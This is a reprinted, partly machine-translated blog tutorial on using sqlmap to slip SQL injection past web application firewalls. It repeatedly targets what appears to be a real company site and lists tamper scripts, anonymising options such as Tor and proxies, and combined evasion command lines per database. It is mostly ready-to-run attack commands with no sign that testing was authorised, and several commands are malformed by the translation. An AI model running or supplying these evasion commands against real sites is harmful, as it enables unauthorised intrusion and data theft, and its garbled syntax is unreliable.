(Reprint) sqlmap bypass the firewall using injection test

http://blog.csdn.net/qq_29277155/article/details/51193071

(Reprint) sqlmap bypass the firewall using injection test

0x00 Foreword

   Now the network environment is often WAF / IPS / IDS to protect Web servers, etc. This protection is often blocked by our filter SQL injection query links, and even blocked our host IP, so this time, we must consider how to conduct bypass, achieve the target injection. Because now WAF / IPS / IDS regarded sqlmap blacklisted, and Oh! However Based sqlmap be bypassed injection test, introduced still practical and effective techniques, the following strategies can successfully bypassed in a particular environment, whether to bypass specific, carefully review the information output.

0x01 confirm WAF

     First, we determine whether the Web server is WAF / IPS / IDS protected. This is easy to achieve, because we are missing sweep or use a special tool to detect whether there WAF, this detection, there are, we can use nmap in the NSE, or WVS of policy or strategy in these APPSCAN judge. Here we also introduce the use sqlmap to detect whether there WAF / IPS / IDS

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#首选

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10  --check-waf#备选

0x02 using parameter bypass

root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 # using any browser to bypass, especially in WAF misallocation of time

root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3 # to bypass using HTTP parameter pollution, especially in the ASP. NET / IIS platform on

root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay = 3.5 --time-sec = 60 # used to avoid long delays WAF trigger mechanism, which is time-consuming way

root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy = 211.211.211.211: 8080 --proxy-cred = 211: 985 # Use agent for injection

root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy # prohibit the use of the agent system, direct connection injection

root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session # empty session reconstruction injection

root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex # or parameter --no-cast, character code conversion

root @ kali: ~ # sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile # mobile injection end server

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # 匿名注入

0x03 introduced using a script

1 using the format:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py,B.py#脚本A，脚本B 

Script 2 general category

01 apostrophemask.py # marks replaced with utf8; Example: ( "1 AND '1' = '1")' 1 AND% EF% BC% 871% EF% BC% 87 =% EF% BC% 871 '

02 equaltolike.py#MSSQL * SQLite中like 代替等号；Example:  Input: SELECT * FROM users WHERE id=1 ；Output: SELECT * FROM users WHERE id LIKE 1

Greatest.py # 03 the MySQL in bypassing the filter '>', with numbers greater than GREATEST replaced; Example: ( '1 AND A > B') '1 AND GREATEST (A, B + 1) = A'

04 space2hash.py # replace spaces and line breaks random string numbers #; Input: 1 AND 9227 = 9227; Output: 1% 23PTTmJopxdWJ% 0AAND% 23cWfcVRPV% 0A9227 = 9227

05 apostrophenullencode.py # MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL double quotes bypass the filter, replace characters and double quotes;

06 halfversionedmorekeywords.py # When the database to bypass the firewall when mysql, mysql version to add a comment before each keyword;

07 space2morehash.py # MySQL replace spaces in the # and more random string line breaks;

Load zero byte character code 08 appendnullbyte.py # Microsoft Access end position in the payload; Example: ( '1 AND 1 = 1') '1 AND 1 = 1% 00'

09 ifnull2ifisnull.py # MySQL, SQLite (possibly), SAP MaxDB bypassing the filter of IFNULL. Alternatively similar 'IFNULL (A, B)' of 'IF (ISNULL (A), B, A)'

10 space2mssqlblank.py (mssql) #mssql replaced by other empty spaces symbols

11base64encode.py#用base64编码j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

12 space2mssqlhash.py # replace spaces mssql query

13 modsecurityversioned.py # (mysql filtering space, contains a complete version of the query Notes; Example: ( '1 AND 2> 1--') '1 / * 30874AND 2> 1 * / -!'

14 space2mysqlblank.py # (mysql replaced with spaces other whitespace

15 between.py # MS SQL 2005, MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 replacement by between greater than (>)

16 space2mysqldash.py # MySQL, MSSQL replace the space character ( ") ( '-') followed by a dash comment on a new line ( 'n')

17 multiplespaces.py # add more spaces around SQL keywords; Example: ( '1 UNION SELECT foobar') '1 UNION SELECT foobar'

18 space2plus.py # replace spaces with +; Example: ( 'SELECT id FROM users') 'SELECT + id + FROM + users'

19 bluecoat.py # MySQL 5.1, after SGOS character instead of spaces with a valid random whitespace characters SQL statements. Like to then replace =

20 nonrecursivereplacement.py # double query. Replace predefined SQL keywords with representation suitable for alternative (eg .replace ( "SELECT", "")) filters

21 space2randomblank.py # instead of a space character ( "") alternate character from a random set of blank characters are valid

22 sp_password.py # append sp_password 'end of the payload 26 from the automatic log blurring processing DBMS

23 chardoubleencode.py # bis url encoding (coding not processed)

24 unionalltounion.py#替换UNION ALL SELECT UNION SELECT；Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

25 charencode.py#Microsoft SQL Server 2005，MySQL 4, 5.0 and 5.5，Oracle 10g，PostgreSQL 8.3, 8.4, 9.0url编码；

26 randomcase.py # Microsoft SQL Server 2005, MySQL 4, 5.0 and 5.5, Oracle 10g, PostgreSQL 8.3, 8.4, 9.0 in the random case

27 unmagicquotes.py # wide character bypass GPC addslashes; Example: * Input: 1 'AND 1 = 1 * Output: 1% bf% 27 AND 1 = 1-% 20

With 28 randomcomments.py # / ** / sql split key; Example: 'INSERT' becomes 'IN // S // ERT'

29 charunicodeencode.py # ASP, ASP.NET unicode string encoding;

30 securesphere.py # additional special string; Example: ( '1 AND 1 = 1') "1 AND 1 = 1 and '0having' = '0having'"

31 versionedmorekeywords.py # MySQL> = 5.1.13 Notes bypass

32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’

33 halfversionedmorekeywords.py # MySQL <5.1 keywords preceded by comments

 

0x04 script parameter to bypass the portfolio strategy

1 mysql bypass:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 -delay=3.5 --tamper=space2hash.py,modsecurityversioned.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent --hpp  --tamper=space2mysqldash.p,versionedmorekeywords.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=apostrophemask.py,equaltolike.py

NOTE: These strategies can be combined according to the feedback information injection, timely adjustment of portfolio strategy

2 MSSQL：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  -delay=3.5  ----user-agent=" Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/38.0.696.12 Safari/534.24” --tamper=randomcase.py,charencode.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --hpp --tamper=space2comment.py,randomcase.py
root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --time-sec=120  --tamper=space2mssqlblank.py,securesphere.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --tamper=unionalltounion.py,base64encode.p

3 ms access:

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent  --tamper=appendnullbyte.py,space2plus.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=3.5 --random-agent --hpp  --tamper=chardoubleencode.py

4 Oracle：

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5 --random-agent --hpp --tamper=unmagicquotes.py,unionalltounion.py

root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4"  --delay=5--user-agent =“Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0” --hpp --tamper=charunicodeencode.py,chardoubleencode.py

5 建议：

      因为WAF可能采用白名单规则，所以对于选择哪种策略，重点是根据-v 3 提示的信息进行判断，可以抓取主流的浏览器的user-agent ,s适当的延时，加上注入字符转换---大小写、空格、字符串、注释、加密等等方式

      Given the parameters and the 32 scripts in our usual injection, to be tested by these different multiple combinations, this test is time-consuming or

ps: Reproduced source http://blog.csdn.net/qq_29277155/article/details/51193071, thanks to the author's share